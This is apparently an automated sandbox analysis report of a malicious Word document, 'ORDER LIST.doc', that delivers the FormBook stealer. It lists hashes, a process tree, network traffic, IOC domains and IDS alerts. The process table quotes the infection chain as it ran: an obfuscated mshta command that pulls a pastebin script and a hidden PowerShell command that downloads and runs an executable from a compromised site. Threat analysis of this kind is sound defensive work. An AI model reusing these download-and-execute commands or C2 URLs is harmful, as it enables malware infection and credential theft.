| Field | Value |
|---|---|
| File name | ORDER LIST.doc |
| Full analysis | https://app.any.run/tasks/54840fb4-00c1-4580-8cff-91df6cfa3a30 |
| Verdict | Malicious activity |
| Threats | FormBook is a data stealer distributed as malware-as-a-service (MaaS). It differs from much competing malware in its extreme ease of use, which lets even inexperienced threat actors deploy it. |
| Analysis date | January 18, 2019, 02:04:15 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/octet-stream |
| File info | data |
| MD5 | A3AC2590B7E47B80769F8C97A479D9AC |
| SHA1 | 39DBA747EFC477A45D9B46292DCB57DF9B8768FF |
| SHA256 | B60AE7B30DA0309A70C35B0EF86290C375F278F48A5648F1886031BBA555149D |
| SSDEEP | 96:1BxVmT0Uz5YOFaDQnQyeVsM2w73LzrRo072spXzmiSLUKhkNY5Tyv3aKZLqX2lAi:Peoa+Occd22w/9VXCiWVOKTatai |

| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ORDER LIST.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3404 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
| 4080 | cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/7QgApPm3 | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2556 | mSHta https://pastebin.com/raw/7QgApPm3 | C:\Windows\system32\mshta.exe | — | cMd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 3660 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://www.tibetsaveandcare.org/sites/default/files/king4.exe',$env:Temp+'\IGLZOC.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\IGLZOC.Exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3100 | "C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | — | powershell.exe | User: admin; Company: SUPERSESSION9; Integrity Level: MEDIUM; Description: recombination; Exit code: 0; Version: 2.02.0007 |
| 2920 | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | — | IGLZOC.Exe | User: admin; Company: SUPERSESSION9; Integrity Level: MEDIUM; Description: recombination; Exit code: 0; Version: 2.02.0007 |
| 2708 | "C:\Windows\System32\msiexec.exe" | C:\Windows\System32\msiexec.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| 2872 | /c del "C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe" | C:\Windows\System32\cmd.exe | — | msiexec.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 284 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE7D4.tmp.cvr | — | — | — |
| 3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L7F6RJPPYOGQRB2NITU5.temp | — | — | — |
| 3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$DER LIST.doc | pgc | 64CD440EA9B3A16DD86DB0F1BD96BF70 | 3BE16D0EEAF814A3CACFCDA1A408C19DEEE8EA503888752EE14D4F86013FE70D |
| 3100 | IGLZOC.Exe | C:\Users\admin\AppData\Local\Temp\~DF538D7964AD314682.TMP | binary | F751836DEAD1F8E06015EDB43E1B0666 | 13D455B0528D2BAF040400F84E8F1BC192003077A66C03B87A1412D6B08CDDE9 |
| 3660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\IGLZOC.Exe | executable | 2B5FF14000782024F817A7CC0A096180 | 86102FC2A19EF57922E19C798CB9CEFB92D5011D8B40F9B568066680C99029C0 |
| 3896 | DllHost.exe | C:\Program Files\Kxpcdann\win9r8tzl.exe | executable | 2B5FF14000782024F817A7CC0A096180 | 86102FC2A19EF57922E19C798CB9CEFB92D5011D8B40F9B568066680C99029C0 |
| 3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 2F778CCCCEFC881595E02404ED7E04FB | 2DC8F82D637DF1C2EB793718FFEDAAA61D9DD48F1AA2E8E25C5F5D6D2C812042 |
| 3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f39b.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 2556 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | F51935F2ADD1D6E2AAB822E3E4310F3C | 3514483A997574F6A9C04C8E1D0D5F67352D9D10FC00444282002ADBEC1C6216 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3660 | powershell.exe | GET | 200 | 213.186.33.40:80 | http://www.tibetsaveandcare.org/sites/default/files/king4.exe | FR | executable | 538 Kb | malicious |
284 | explorer.exe | POST | — | 217.160.0.85:80 | http://www.knowell-online.com/ki/ | DE | — | — | malicious |
284 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.andytrains.com/ki/?5j=UHjienhsSDrUenCC5TStA0y6Ue+940OULrM3MbvLD/50GF0v+4fHgk9jUud1VcQr46mddg==&Up8l=cVTpThZp90h404&sql=1 | US | html | 186 b | shared |
284 | explorer.exe | GET | 400 | 198.185.159.144:80 | http://www.livelymccabe.com/ki/?5j=8LB5lk2it2PX6c+HtvgvYAYiso1NBLtOROwOp6fyvzxAkeHERWp3InXXx5MjQg4m4jghiw==&Up8l=cVTpThZp90h404 | US | html | 378 b | malicious |
284 | explorer.exe | GET | 302 | 23.20.239.12:80 | http://www.salmonidata.com/ki/?5j=ds8gVWoSLZp0ZDBJEyK8qnrKsAqY9VizRIFuJtahimP0plrD5mM4WB8v5utVk3mfNMaSBA==&Up8l=cVTpThZp90h404&sql=1 | US | html | 187 b | shared |
284 | explorer.exe | POST | — | 217.160.0.85:80 | http://www.knowell-online.com/ki/ | DE | — | — | malicious |
284 | explorer.exe | POST | — | 54.243.199.87:80 | http://www.countrysidekim.com/ki/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.andytrains.com/ki/ | US | — | — | shared |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.salmonidata.com/ki/ | US | — | — | shared |
284 | explorer.exe | POST | — | 23.20.239.12:80 | http://www.salmonidata.com/ki/ | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2556 | mshta.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
284 | explorer.exe | 217.160.0.85:80 | www.knowell-online.com | 1&1 Internet SE | DE | malicious |
3660 | powershell.exe | 213.186.33.40:80 | www.tibetsaveandcare.org | OVH SAS | FR | malicious |
284 | explorer.exe | 198.185.159.144:80 | www.livelymccabe.com | Squarespace, Inc. | US | malicious |
284 | explorer.exe | 23.20.239.12:80 | www.andytrains.com | Amazon.com, Inc. | US | shared |
284 | explorer.exe | 54.243.199.87:80 | www.countrysidekim.com | Amazon.com, Inc. | US | malicious |
284 | explorer.exe | 199.192.23.212:80 | www.smaleg.com | — | US | malicious |

| Domain | IP | Reputation |
|---|---|---|
| pastebin.com | | shared |
| www.tibetsaveandcare.org | | malicious |
| www.livelymccabe.com | | malicious |
| www.knowell-online.com | | malicious |
| www.entieval.com | | unknown |
| www.andytrains.com | | shared |
| www.salmonidata.com | | shared |
| www.smaleg.com | | malicious |
| www.mariaandjoesayido.com | | unknown |
| www.countrysidekim.com | | malicious |

PID | Process | Class | Message |
---|---|---|---|
3660 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3660 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |